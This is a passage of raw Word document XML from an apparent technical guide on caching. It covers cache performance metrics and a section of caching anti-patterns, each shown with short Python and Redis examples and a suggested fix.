    </w:p>
    <w:p w14:paraId="13137EF7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA74D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache Hit Rate:     hits / (hits + misses)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C603A69" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Per cache tier, per content type, per endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ADA8E2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Alert threshold: &lt; 90% for production caches (tune based on workload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34BEAA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="6183746B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache Miss Penalty: avg latency_on_miss - avg latency_on_hit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B162609" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  = backing store latency on miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBDCFBA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  = how much each miss hurts latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD71611" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Target: minimize through tiering (shorter backing store path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357681FD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="1E658B79" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache Eviction Rate: evictions / second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A45C27" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  High eviction rate → cache is undersized for the working set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14700AAE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Items being evicted before TTL → add cache capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295665C4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="728ADEA6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Backend Load Reduction: 1 - (backend_requests / total_requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C8D53" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  = cache absorption rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F168F48" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  The business metric: how much traffic is the cache handling?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8386BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="43D4C25F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Cache Efficiency: hit_rate / (cache_size / total_data_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54319BD0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  How much hit rate per unit of cache capacity?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E336A95" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Compare against theoretical maximum for the access distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658C9ECF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">  Low efficiency → wrong eviction policy or poor cache key design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB54C61" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:pict w14:anchorId="3358BE22">
          <v:rect id="_x0000_i4796" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4015A1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Caching Anti-Patterns — What Goes Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AAD02" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 1: Caching Mutable Without Invalidation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C18BD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE03F9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Wrong: cache product data with 1-hour TTL, no invalidation on update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B1DEE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_product(product_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19580F54" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    cached = redis.get(f'product:{product_id}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6250BC9D" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    if cached:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60CE97" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">        return json.loads(cached)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E264D9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    product = db.query("SELECT * FROM products WHERE id = %s", product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7243CB8B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    redis.setex(f'product:{product_id}', 3600, json.dumps(product))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE4974C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D0591" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="7E1B6609" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def update_product_price(product_id, new_price):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2669B7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    db.update("UPDATE products SET price = %s WHERE id = %s", new_price, product_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B29AD2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    # MISSING: redis.delete(f'product:{product_id}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA688C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Users will see old price for up to 1 hour after the change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B978D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The impact:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Price changes, stock updates, and content changes are invisible to users for the entire TTL duration. In e-commerce, this means customers see incorrect prices and out-of-stock items as available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C6EA6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Always invalidate (delete or update) cache entries when the backing data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140D9ACB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 2: Caching at Wrong Granularity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F811F8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD64817" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Wrong: caching entire large objects when only parts are needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A984A89" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>def get_user_profile(user_id):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F703BBE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # Caches the entire user object (100+ fields, 10KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0B6EB" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    # But most callers only need name + avatar (200 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39665FD7" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    user = cache.get_or_compute(f'user:{user_id}', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2777885C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">                                lambda: db.get_full_user(user_id))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6EF50" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    return user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1807AB41" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="79419242" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve"># Problem: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6394F046" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># 1. Memory inefficient (caching 10KB when 200 bytes suffice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D2A8D6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># 2. Any change to any field (last_login, email_verified) invalidates entire cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A3F9CD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># 3. High churn — frequent invalidation → low hit rate despite high access rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B30211" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Cache at the granularity of actual access patterns. Cache separate fields or sub-objects when different parts have different update frequencies and different consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426322CA" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 3: Cache Stampede from Synchronized TTLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A6656" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74F1F9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Wrong: all cache entries get exactly the same TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20739355" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># → all entries expire simultaneously → simultaneous stampede</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE7EE5C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="38B00807" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t>for product in products:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430CEC1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t xml:space="preserve">    redis.setex(f'product:{product.id}', 3600, json.dumps(product))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78B6A0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># All 10,000 products expire at exactly the same time (3600 seconds from loading)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05030347" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># At T+3600: 10,000 simultaneous cache misses → 10,000 simultaneous DB queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA164AD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
      <w:r w:rsidRPr="008A51E9">
        <w:t> Add random jitter to TTLs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA02F4B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543200C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3130FE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="393168CD" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>base_ttl = 3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E42DC" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>jitter = random.randint(0, 600)  # ±600 second jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7C936" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>redis.setex(f'product:{product.id}', base_ttl + jitter, json.dumps(product))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADF0DE9" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Expiry spread over a 600-second window → stampedes are 600s windows, not simultaneous spikes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A256FB2" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 4: Ignoring Memory Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AE784" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D0835B" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Wrong: caching every user's data without considering memory footprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BE9B6" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="0851D90A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># 10 million users × 5KB average cached data = 50GB Redis requirement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47001A17" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># At $0.10/GB/month for Redis: $5,000/month just for user cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5CCCE" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Question: what's the hit rate? If only 100K users are active:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BEDC9F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>#   Active users' data: 100K × 5KB = 500MB (high hit rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562274CF" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>#   Inactive users' data: 9.9M × 5KB = 49.5GB (hit rate = 0% — never accessed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E81A1F" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>#   99% of cache memory is wasted on data that's never requested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3EC07A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="0B6AB80E" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Fix: cache based on access patterns, not population size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823B041" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Short TTL (5-30 minutes) → inactive users' data naturally evicts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2D65D0" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:lastRenderedPageBreak/>
        <w:t># Redis's LRU/LFU eviction → inactive users automatically evicted under memory pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A798E1" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A51E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 5: Cache as Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA0D20C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A6D5D4" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Wrong: using cache as the primary data store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65D3B8" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="3C783267" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># In Redis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A327D4C" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t>redis.set('user:123:balance', 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDAB52" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9"/>
    <w:p w14:paraId="77A2330A" w14:textId="77777777" w:rsidR="008A51E9" w:rsidRPr="008A51E9" w:rsidRDefault="008A51E9" w:rsidP="008A51E9">
      <w:r w:rsidRPr="008A51E9">
        <w:t># Application modifies balance:</w:t>
      </w:r>
    </w:p>
